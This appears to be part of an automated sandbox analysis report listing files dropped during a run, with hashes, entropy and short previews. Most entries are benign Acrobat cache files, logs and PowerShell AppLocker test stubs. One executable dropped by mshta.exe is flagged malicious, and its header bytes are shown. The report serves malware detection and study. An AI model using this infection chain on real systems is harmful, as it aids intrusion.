                                                                    SHA-512:15EEE25C694E6F9497F5884573727E3CECF1FD703E39D696F51CDDB6185BFAF16C7EBCA36095E454EEAC5BC7A719D6EBBE79F29BFE4BD089143D40002A9D3B4E
                                                                    Malicious:false
                                                                    Preview:{"analyticsData":{"responseGUID":"2ac62332-ea0f-4f00-8867-ac75bedae226","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1734682860941,"statusCode":200,"surfaceID":"DC_Reader_RHP_Intent_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                    File Type:JSON data
                                                                    Category:dropped
                                                                    Size (bytes):287
                                                                    Entropy (8bit):5.22690634012649
                                                                    Encrypted:false
                                                                    SSDEEP:6:YEQXJ2HXFt2V+FY7A/4Ox+FIbRI6XVW7+0YAUUoAvJf21rPeUkwRe9:YvXKXFVW7M1UYpW7/UnG+16Ukee9
                                                                    MD5:E0F45E57B0E9D468BD396C0C0B0AF75B
                                                                    SHA1:1E61692B057E831C973F14469C286DCA4835BE14
                                                                    SHA-256:D1172F13F7AF85E041018A625B97E584578B5720E8E2CBF260D5F735A01A2FEB
                                                                    SHA-512:842B1E940675E0734B008EDC8B54E03DD970D58D01A3EC2B3A291F096F388AE0E0FBD3B534647A03F43CD84B85BFBC993CB33A28367EE7CE46AB259D1A9FE1E5
                                                                    Malicious:false
                                                                    Preview:{"analyticsData":{"responseGUID":"2ac62332-ea0f-4f00-8867-ac75bedae226","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1734682860941,"statusCode":200,"surfaceID":"DC_Reader_RHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                    File Type:JSON data
                                                                    Category:dropped
                                                                    Size (bytes):1090
                                                                    Entropy (8bit):5.655864601085958
                                                                    Encrypted:false
                                                                    SSDEEP:24:Yv6X06Fi/UYamXayLgE+cNDxeNaqnAvz7xHn0RCmK8czOC/BSG:Yv3ceBgkDMUJUAh8cvMG
                                                                    MD5:7AB7B5ADA3F329A1FCA7297E46B4D1A5
                                                                    SHA1:50C1055E27EC421A1E7523CF4E4B34A29D4EB86F
                                                                    SHA-256:16252809F11748C4A352E01360D734A86B25D0F2DD9F62A30AA595CCA0F2FED9
                                                                    SHA-512:81087583F1517FFB3E906CA9BC90D68B23443528A4BC30B0290A1FDD45038F7183260FA57C08E61CDAF113143A1862E9DC43396069253325D99AAB429E674C59
                                                                    Malicious:false
                                                                    Preview:{"analyticsData":{"responseGUID":"2ac62332-ea0f-4f00-8867-ac75bedae226","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1734682860941,"statusCode":200,"surfaceID":"DC_Reader_Sign_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Sign_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_0","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"266234d2-130d-426e-8466-c7a061db101f","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Sign_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IlVwZ3JhZGVSSFBSZHJBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkVhc2lseSBmaWxsIGFuZCBzaWduIFBERnMuIn0sInRjYXRJZCI6bnVsbH0=","dataType":"app
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                    File Type:JSON data
                                                                    Category:dropped
                                                                    Size (bytes):286
                                                                    Entropy (8bit):5.202036477597807
                                                                    Encrypted:false
                                                                    SSDEEP:6:YEQXJ2HXFt2V+FY7A/4Ox+FIbRI6XVW7+0YAUUoAvJfshHHrPeUkwRe9:YvXKXFVW7M1UYpW7/UnGUUUkee9
                                                                    MD5:8991FF9FA51640F7E3AE5232BA0E3FB9
                                                                    SHA1:B3D20F0CD603BFAF4E69475067F0B2B3C15F3860
                                                                    SHA-256:7B7ABE43836BD4F55905834AE2D469C4ACE1F26CD81A626E6D9861090D337230
                                                                    SHA-512:AFE54590CD8E7DA66BE3E26D008994A9CFEC4DDC88D619695A2B78DCCDF4763CDFC2C5F816FCC1207050CCA53E7359F7083EB20FA1ABAB3D0C4462EA126508A9
                                                                    Malicious:false
                                                                    Preview:{"analyticsData":{"responseGUID":"2ac62332-ea0f-4f00-8867-ac75bedae226","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1734682860941,"statusCode":200,"surfaceID":"DC_Reader_Upsell_Cards","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                    File Type:JSON data
                                                                    Category:dropped
                                                                    Size (bytes):282
                                                                    Entropy (8bit):5.209959087707028
                                                                    Encrypted:false
                                                                    SSDEEP:6:YEQXJ2HXFt2V+FY7A/4Ox+FIbRI6XVW7+0YAUUoAvJTqgFCrPeUkwRe9:YvXKXFVW7M1UYpW7/UnGTq16Ukee9
                                                                    MD5:A1ED34BD8A5785B0B5A95E4731F10CE5
                                                                    SHA1:2F56FE053D819D951F971D0F81D48C54FAB14BCA
                                                                    SHA-256:68A3BF8E4178E71087DF05ED3B14A22F2D256BE29E2D8C169DBCD90F3BDFC165
                                                                    SHA-512:6964F3985674C011119DEF678742AC61403122FC67BFB4F01106B0446604CEB2ACCD6562451A365659DAA4E82FC92DA1A76CB4BD1AE72FB3CF4531672E4551DC
                                                                    Malicious:false
                                                                    Preview:{"analyticsData":{"responseGUID":"2ac62332-ea0f-4f00-8867-ac75bedae226","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1734682860941,"statusCode":200,"surfaceID":"Edit_InApp_Aug2020","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):4
                                                                    Entropy (8bit):0.8112781244591328
                                                                    Encrypted:false
                                                                    SSDEEP:3:e:e
                                                                    MD5:DC84B0D741E5BEAE8070013ADDCC8C28
                                                                    SHA1:802F4A6A20CBF157AAF6C4E07E4301578D5936A2
                                                                    SHA-256:81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
                                                                    SHA-512:65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
                                                                    Malicious:false
                                                                    Preview:....
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                    File Type:JSON data
                                                                    Category:dropped
                                                                    Size (bytes):2814
                                                                    Entropy (8bit):5.132594830311187
                                                                    Encrypted:false
                                                                    SSDEEP:24:YvA1vaQWFHayKswgqrnN6YwPqWzwuxjMG4j0Sne8BCz2E/2LS5CN8gbR8Ek5U/7h:YYDYTXoN1LgQ9Ix3i8G8Ti/79M0h
                                                                    MD5:452819620804BB1EA63F697581F8B3B4
                                                                    SHA1:3DCA3FE29E0E573E7EF9CBCF8E444E28867FC8BE
                                                                    SHA-256:B2B8DB1BCDF5DFE576FE89C44B52713536C7ED4EB732CF83E3BAD41DB2CEE5E2
                                                                    SHA-512:F591350A4BE4618C5A970A2022CD2008E6E160351BAB7F5ADFB8DC0545E24772340F3B1E7CAF3F62F2971D791AF75875C31C99358326AFB322E2F388425F914F
                                                                    Malicious:false
                                                                    Preview:{"all":[{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"596fd5299c1b5cf1ca755dfc983a0d05","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":289,"ts":1734509595000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"c8bc4500d4aebb8b962c2f03a16ac819","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":1090,"ts":1734509595000},{"id":"DC_Reader_Convert_LHP_Banner","info":{"dg":"c4be4bce37b2eef005aafbb46655529f","sid":"DC_Reader_Convert_LHP_Banner"},"mimeType":"file","size":1123,"ts":1734509595000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"155e97d759b6ec70b482e40970253e65","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":295,"ts":1734509595000},{"id":"DC_Reader_Disc_LHP_Retention","info":{"dg":"539fe23b096b501d721fbbf18e76ce53","sid":"DC_Reader_Disc_LHP_Retention"},"mimeType":"file","size":292,"ts":1734509595000},{"id":"DC_Reader_More_LHP_Banner","info":{"dg":"e49eb8727fc3040dfcaacdc007182f2b","sid":"DC_Reader_More_LHP_Banner"},"mimeType":"file","
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 19, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 19
                                                                    Category:dropped
                                                                    Size (bytes):12288
                                                                    Entropy (8bit):0.9846647752991913
                                                                    Encrypted:false
                                                                    SSDEEP:24:TLHRx/XYKQvGJF7urs6I1RZKHs/Ds/SpDYv4zJwtNBwtNbRZ6bRZ4yYvF:TVl2GL7ms6ggOVpDYgzutYtp6PVY9
                                                                    MD5:196E4850DCEEAA3E62BEF03B55558BA9
                                                                    SHA1:319BAEBAE04047E8B15F7FC3E12DD6CF837B1F6F
                                                                    SHA-256:F641A323BC39FC6CA62086FDC895E7FC38AA57505A6236C95C50135A43C38F23
                                                                    SHA-512:29BA3B00B01C07832F9167ED30E7ED112D6D0A12790F482ED0D088ABBB9A9697EF0E99C1DF5B8B02AC998C53ADAD6DC1F8668023084AF3CADD3AE0063BA24BD7
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                    File Type:SQLite Rollback Journal
                                                                    Category:dropped
                                                                    Size (bytes):8720
                                                                    Entropy (8bit):1.339152947036606
                                                                    Encrypted:false
                                                                    SSDEEP:24:7+tYAD1RZKHs/Ds/SpDYvPzJwtNBwtNbRZ6bRZWf1RZKEqLBx/XYKQvGJF7ursX:7MYGgOVpDYHzutYtp6PMJqll2GL7msX
                                                                    MD5:9BA5316AF917988CCB58490A640F2491
                                                                    SHA1:C46FA9AD582BBFDE3C31BA2B18CA0B91B042D000
                                                                    SHA-256:A0829B6870CC781F2C383B34F91089E5D9132D502646400C5329CB196FEB1C02
                                                                    SHA-512:09FB04AF7DE497CEEB2519B2F5394D38F2F261163B064A6D28D75D6985BDAC9F24D2D9218544F1A341D798857F9B2DC19AD3ADC8A0CCFB0EF01437B52ABCAE14
                                                                    Malicious:false
                                                                    Preview:.... .c........K......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................j...#..#.#.#.#.#.#.#.#.7.7........................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):66726
                                                                    Entropy (8bit):5.392739213842091
                                                                    Encrypted:false
                                                                    SSDEEP:768:RNOpblrU6TBH44ADKZEg6eZ8/ZglGv5MlAZ36ldSWEzYckYyu:6a6TZ44ADE6eZ8glGv0vEzYHK
                                                                    MD5:30481C3B25BCA8F31D113A8FE31931D4
                                                                    SHA1:61DB009BBF83A44BDA33AFC766043C145FA84B08
                                                                    SHA-256:4314DBBE746BF16B19177F61219DC70E5F8C1E78E6DB577D19BF311478A05DB8
                                                                    SHA-512:0AE55DA2B7A572868E6E31DB7843BCDF97306083F32F13129CC1EEED6B4B788FF1A6F2A67B92004B363BA401DC132BB0131A8C97B4F857574389178904435951
                                                                    Malicious:false
                                                                    Preview:4.397.90.FID.2:o:..........:F:AgencyFB-Reg.P:Agency FB.L:$.........................."F:Agency FB.#.96.FID.2:o:..........:F:AgencyFB-Bold.P:Agency FB Bold.L:%.........................."F:Agency FB.#.84.FID.2:o:..........:F:Algerian.P:Algerian.L:$..........................RF:Algerian.#.95.FID.2:o:..........:F:ArialNarrow.P:Arial Narrow.L:$.........................."F:Arial Narrow.#.109.FID.2:o:..........:F:ArialNarrow-Italic.P:Arial Narrow Italic.L:$.........................."F:Arial Narrow.#.105.FID.2:o:..........:F:ArialNarrow-Bold.P:Arial Narrow Bold.L:%.........................."F:Arial Narrow.#.118.FID.2:o:..........:F:ArialNarrow-BoldItalic.P:Arial Narrow Bold Italic.L:%.........................."F:Arial Narrow.#.77.FID.2:o:..........:F:ArialMT.P:Arial.L:$.........................."F:Arial.#.91.FID.2:o:..........:F:Arial-ItalicMT.P:Arial Italic.L:$.........................."F:Arial.#.87.FID.2:o:..........:F:Arial-BoldMT.P:Arial Bold.L:$.........................."F:Arial.#.100.FID.2
                                                                    Process:C:\Windows\System32\mshta.exe
                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):78114
                                                                    Entropy (8bit):4.994794569777259
                                                                    Encrypted:false
                                                                    SSDEEP:768:fsnZcnsXsnZcnsWxojUsnZcnsGCsnZcns:EZcbZcvxoRZcLZc
                                                                    MD5:7F1392C63A92E5F06FA6F9F95F103CD9
                                                                    SHA1:26D5CD231FC46C96B71DFBF4D08768C38399F027
                                                                    SHA-256:22B77AC7A5ABC7DF6BC21C1411121242E0A9F7179EF5DBBDDCE745AE04A13E21
                                                                    SHA-512:089EA813ED8E4F5CFD854D06D6EBA66BEC924F74B29329B95FF46D0C875CD05EA6BAADFBB71C79FF5E6DCE112D2A7AC90EA6BE17F39454281DF06B83D5FD1A9F
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 55%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........W..W..W..C...V..C...U..C...C..C...P..W..s..C...V..C.|.V..C...V..RichW..........................PE..L...C.05............................@........ ....@..........................`......._....@...... ...........................0..P....@.......................P..@.......T............................................0...............................text...t........................... ..`.data...p.... ......................@....idata.......0......................@..@.rsrc........@......................@..@.reloc..@....P.......&..............@..B........................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):64
                                                                    Entropy (8bit):0.34726597513537405
                                                                    Encrypted:false
                                                                    SSDEEP:3:Nlll:Nll
                                                                    MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                    SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                    SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                    SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                    Malicious:false
                                                                    Preview:@...e...........................................................
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):246
                                                                    Entropy (8bit):3.51161293806784
                                                                    Encrypted:false
                                                                    SSDEEP:6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K8sKDg7:Qw946cPbiOxDlbYnuRKSE7
                                                                    MD5:664818485FA149DEB73B771C22D621EF
                                                                    SHA1:7C5FE102E408EFFA20FEC670F61E9D18FE20F964
                                                                    SHA-256:82F261AFB5CE3060723DB37A34A1798FB09582A6C54522D8429E9DACD3493E38
                                                                    SHA-512:313CBE8BEE20CE2AD61E752AB28803B086A1E32A1FD2DCB3336B264CC83E294BB6B78C7DF9E69C935103646EFDE52DEDC12BC2BE3ABCA98F0554E038898779E0
                                                                    Malicious:false
                                                                    Preview:..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .1.8./.1.2./.2.0.2.4. . .0.3.:.1.3.:.1.7. .=.=.=.....
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                    File Type:ASCII text, with very long lines (393)
                                                                    Category:dropped
                                                                    Size (bytes):16525
                                                                    Entropy (8bit):5.376360055978702
                                                                    Encrypted:false
                                                                    SSDEEP:384:6b1sdmfenwop+WP21h2RPjRNg7JjO2on6oU6CyuJw1oaNIIu9EMuJuF6MKK9g9JQ:vIn
                                                                    MD5:1336667A75083BF81E2632FABAA88B67
                                                                    SHA1:46E40800B27D95DAED0DBB830E0D0BA85C031D40
                                                                    SHA-256:F81B7C83E0B979F04D3763B4F88CD05BC8FBB2F441EBFAB75826793B869F75D1
                                                                    SHA-512:D039D8650CF7B149799D42C7415CBF94D4A0A4BF389B615EF7D1B427BC51727D3441AA37D8C178E7E7E89D69C95666EB14C31B56CDFBD3937E4581A31A69081A
                                                                    Malicious:false
                                                                    Preview:SessionID=03c9683a-b9c7-43c5-80d5-ee4bbf74fb26.1696428955961 Timestamp=2023-10-04T16:15:55:961+0200 ThreadID=6596 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=03c9683a-b9c7-43c5-80d5-ee4bbf74fb26.1696428955961 Timestamp=2023-10-04T16:15:55:962+0200 ThreadID=6596 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=03c9683a-b9c7-43c5-80d5-ee4bbf74fb26.1696428955961 Timestamp=2023-10-04T16:15:55:962+0200 ThreadID=6596 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=03c9683a-b9c7-43c5-80d5-ee4bbf74fb26.1696428955961 Timestamp=2023-10-04T16:15:55:962+0200 ThreadID=6596 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=03c9683a-b9c7-43c5-80d5-ee4bbf74fb26.1696428955961 Timestamp=2023-10-04T16:15:55:962+0200 ThreadID=6596 Component=ngl-lib_NglAppLib Description="SetConfig:
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                    File Type:ASCII text, with very long lines (393), with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):15114
                                                                    Entropy (8bit):5.385228036583042
                                                                    Encrypted:false
                                                                    SSDEEP:384:UfgTg6gjgjgOgMMg6g1g1gAvgigLNf/g3BV4Q7wcRG2oAgvgHTRJ5FpBLB3SDkMa:5Gb
                                                                    MD5:4A5154176CA09016D9B066DECFD1C00A
                                                                    SHA1:60B65CD97CD6AE9862E32B7FB5F80E3B1D62AC89
                                                                    SHA-256:C635A9D1F97E49C3590C6362734FBAEB7ECE0F63FE495A70075EB3B8603104DA
                                                                    SHA-512:02DCDAE9D850131C8450900EC1316EF785B30EFDE0130B517EB25F20855B07641851A09DB28D752464C76EE5DB9B484C26BD045B82CEE837BC584CBC85D6CCAD
                                                                    Malicious:false
                                                                    Preview:SessionID=0f6617b9-a70f-4f41-8f35-a854d06c6fbf.1734509587227 Timestamp=2024-12-18T03:13:07:227-0500 ThreadID=7684 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------"..SessionID=0f6617b9-a70f-4f41-8f35-a854d06c6fbf.1734509587227 Timestamp=2024-12-18T03:13:07:229-0500 ThreadID=7684 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found"..SessionID=0f6617b9-a70f-4f41-8f35-a854d06c6fbf.1734509587227 Timestamp=2024-12-18T03:13:07:229-0500 ThreadID=7684 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!"..SessionID=0f6617b9-a70f-4f41-8f35-a854d06c6fbf.1734509587227 Timestamp=2024-12-18T03:13:07:229-0500 ThreadID=7684 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1"..SessionID=0f6617b9-a70f-4f41-8f35-a854d06c6fbf.1734509587227 Timestamp=2024-12-18T03:13:07:229-0500 ThreadID=7684 Component=ngl-lib_NglAppLib Description="SetConf
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                    File Type:ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):29752
                                                                    Entropy (8bit):5.39863434600666
                                                                    Encrypted:false
                                                                    SSDEEP:768:GLxxlyVUFcAzWL8VWL1ANSFld5YjMWLvJ8Uy++NSXl3WLd5WLrbhhVClkVMwDGb3:j
                                                                    MD5:B36DE20FA1A860170F6D4747603EEC0E
                                                                    SHA1:2A1619E46965BF592D21B08538136A94B5DB4699
                                                                    SHA-256:CEA2F0D9D01B37658C335E16DD266CD3F71EC856B6A86503578D0639D9BD1798
                                                                    SHA-512:EB0DA9C7D1D8C174FC44074316DA7CAEEF92B71C74069405715D0E943B0EE5C9EDA1A258E0CD6BE3F43C0ED45D8DAC5732247483DAB7DD401F7BDCA6F7C1E1F7
                                                                    Malicious:false
